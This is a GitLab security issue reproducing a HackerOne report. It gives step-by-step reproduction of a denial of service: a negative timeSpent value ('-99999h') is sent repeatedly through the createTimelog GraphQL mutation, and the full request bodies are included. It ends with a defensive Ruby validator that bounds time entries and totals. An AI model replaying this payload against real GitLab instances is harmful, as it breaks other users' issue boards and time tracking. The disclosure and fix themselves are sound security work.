
Unvalidated `timeSpent` value in POST /api/graphql `createTimelog` operation leads to unable to load issues on Issue board

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2053154 by toukakirishima on 2023-07-06, assigned to @cmaxim:


Report

Summary

I found a DoS vulnerability when adding Time spent on an Issue; as an attacker I can make the victim unable to see the Time tracking report and also unable to see the Issue on the Board.

Normally you can see Time tracking report and Issue on Board.


But as an attacker I can make the victim unable to see the Time tracking report and also unable to see the Issue on the Board.


Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.


And Touka Kirishima (the victim) created Issues.


Steps to reproduce
  1. Go to Issues
  2. Add Time spent
  3. Click save and make sure Burp Suite is on. You will see a request like the following. Example:
POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23  
Content-Type: application/json  
X-Csrf-Token: x  
X-Gitlab-Feature-Category: team_planning  
Content-Length: 1234  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"1","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n  timelogCreate(input: $input) {\n    errors\n    timelog {\n      id\n      issue {\n        ...IssueTimeTrackingFragment\n        __typename\n      }\n      mergeRequest {\n        ...MergeRequestTimeTrackingFragment\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment TimelogFragment on Timelog {\n  __typename\n  id\n  timeSpent\n  user {\n    id\n    name\n    __typename\n  }\n  spentAt\n  note {\n    id\n    body\n    __typename\n  }\n  summary\n  userPermissions {\n    adminTimelog\n    __typename\n  }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n"}]  
  4. Send to Repeater
  5. Change timeSpent. Example:
POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23  
Content-Type: application/json  
X-Csrf-Token: x  
X-Gitlab-Feature-Category: team_planning  
Content-Length: 1234  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"-99999h","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n  timelogCreate(input: $input) {\n    errors\n    timelog {\n      id\n      issue {\n        ...IssueTimeTrackingFragment\n        __typename\n      }\n      mergeRequest {\n        ...MergeRequestTimeTrackingFragment\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment TimelogFragment on Timelog {\n  __typename\n  id\n  timeSpent\n  user {\n    id\n    name\n    __typename\n  }\n  spentAt\n  note {\n    id\n    body\n    __typename\n  }\n  summary\n  userPermissions {\n    adminTimelog\n    __typename\n  }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n  __typename\n  id\n  humanTotalTimeSpent\n  totalTimeSpent\n  timelogs {\n    nodes {\n      ...TimelogFragment\n      __typename\n    }\n    __typename\n  }\n}\n"}]  


  6. Click Send until the response HTTP/2 500 Internal Server Error appears (usually after clicking Send about 5 times)


  7. Reload the page; you are unable to see the Time tracking report or the Issues on the Board

POV from Attacker (screenshots attached)

POV from Victim (screenshots attached)

POC

bandicam_2023-07-06_22-42-12-864.mp4

Output of checks

This bug happens on GitLab.com

Impact

  • Attacker can make victim unable to see the Time tracking report.
  • Attacker can make victim unable to see Issues on the Board.
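The report shows that a `timeSpent` value such as `-99999h`, accepted without a range check and submitted repeatedly, eventually produces a 500 and leaves the issue board unable to render. The page does not state the root cause, so the following is an added illustration, not GitLab's own code, of the server-side check a defender would want in front of the mutation: parse the human-readable duration, reject malformed input, and refuse any single entry or resulting running total that falls outside a bounded range. It assumes GitLab-style units (s/m/h/d/w with an 8-hour day and 5-day week), a signed 32-bit storage bound for seconds, that a bare number without a unit is rejected, and that a negative running total is never meaningful; all of these are assumptions for the example, not facts from the report.

```ruby
# Added example (not GitLab's code): bounding a "time spent" string and the
# resulting running total before a timelog is persisted.
#
# Assumptions (not taken from the report):
#   - units are s/m/h/d/w, with 8 hours per day and 5 days per week;
#   - a unit is mandatory, so a bare "1" is rejected as malformed;
#   - stored seconds, and the issuable's total after applying the new entry,
#     must fit a signed 32-bit integer;
#   - a negative running total is rejected.
module TimeSpentValidator
  UNIT_SECONDS = {
    "s" => 1,
    "m" => 60,
    "h" => 3600,
    "d" => 8 * 3600,      # assumed 8-hour working day
    "w" => 5 * 8 * 3600,  # assumed 5-day working week
  }.freeze

  INT32_MIN = -(2**31)
  INT32_MAX = 2**31 - 1

  TOKEN = /\A(\d+)([smhdw])\z/

  # Parse "1h 30m" or "-99999h" into seconds; nil for malformed input.
  # Ruby integers are arbitrary precision, so huge inputs cannot overflow
  # here; they are caught by the range check in validate.
  def self.parse_seconds(str)
    return nil unless str.is_a?(String)

    s = str.strip
    return nil if s.empty?

    sign = 1
    if s.start_with?("-")
      sign = -1
      s = s[1..]
    end

    total = 0
    s.split(/\s+/).each do |tok|
      m = TOKEN.match(tok)
      return nil unless m

      total += m[1].to_i * UNIT_SECONDS[m[2]]
    end
    sign * total
  end

  # Validate one new entry against the issuable's current total.
  # Returns { ok: true, seconds: n } or { ok: false, error: "..." }.
  def self.validate(time_spent, current_total_seconds: 0)
    seconds = parse_seconds(time_spent)
    return { ok: false, error: "malformed time_spent" } if seconds.nil?
    return { ok: false, error: "time_spent is zero" } if seconds.zero?

    unless seconds.between?(INT32_MIN, INT32_MAX)
      return { ok: false, error: "time_spent out of range" }
    end

    new_total = current_total_seconds + seconds
    unless new_total.between?(INT32_MIN, INT32_MAX)
      return { ok: false, error: "total time spent would overflow" }
    end

    if new_total.negative?
      return { ok: false, error: "total time spent would become negative" }
    end

    { ok: true, seconds: seconds }
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs mirroring the report: a normal entry, then the
  # oversized negative entry, then the same entry once the total is already
  # deeply negative from repeated submissions.
  p TimeSpentValidator.validate("1h")
  p TimeSpentValidator.validate("-99999h")
  p TimeSpentValidator.validate("-99999h", current_total_seconds: -1_800_000_000)
end
```

Checking the running total, not just the single entry, is the part that matters for the repeated-send step in the report: each submission on its own stays inside the bound, and only the accumulated value crosses it.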

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: